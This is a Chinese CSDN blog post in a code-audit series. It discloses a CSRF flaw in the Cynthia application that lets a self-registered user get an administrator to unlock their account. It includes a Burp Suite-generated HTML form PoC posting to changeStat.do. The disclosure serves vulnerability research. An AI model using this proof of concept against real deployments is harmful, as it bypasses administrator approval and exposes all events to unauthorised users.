Cynthia - There is a CSRF vulnerability in unlocking user status

PD_3569

已于 2022-03-22 10:40:14 修改

阅读量376

点赞数

分类专栏： code 审计文章标签： csrf 前端

于 2021-11-10 11:23:30 首次发布

本文链接：https://blog.csdn.net/qq_33020901/article/details/121244351

版权

code 审计专栏收录该内容

12 篇文章 0 订阅

订阅专栏

Users can register by themselves, but the administrator needs to change the user status before they can log in. After using the CSRF vulnerability to change the status, you can view the details of all events.

1. Click on the system configuration in the upper right corner, click on user management, click on the unlock button

2. Use burpSuit to capture packets, and then generate CSRF poc

3. Will return true after success

POC： Change user status

After the administrator logged in, open the following page

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8080/cynthia_war/user/changeStat.do" method="POST">
      <input type="hidden" name="user" value="vq2lumok@qq.com" />
      <input type="hidden" name="status" value="normal" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

中国移动通信集团广西有限公司

PD_3569

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Cynthia - There is a CSRF vulnerability in unlocking user status

Users can register by themselves, but the administrator needs to change the user status before they can log in. After using the CSRF vulnerability to change the status, you can view the details of all events.1. Click on the system configuration in the u.
复制链接

扫一扫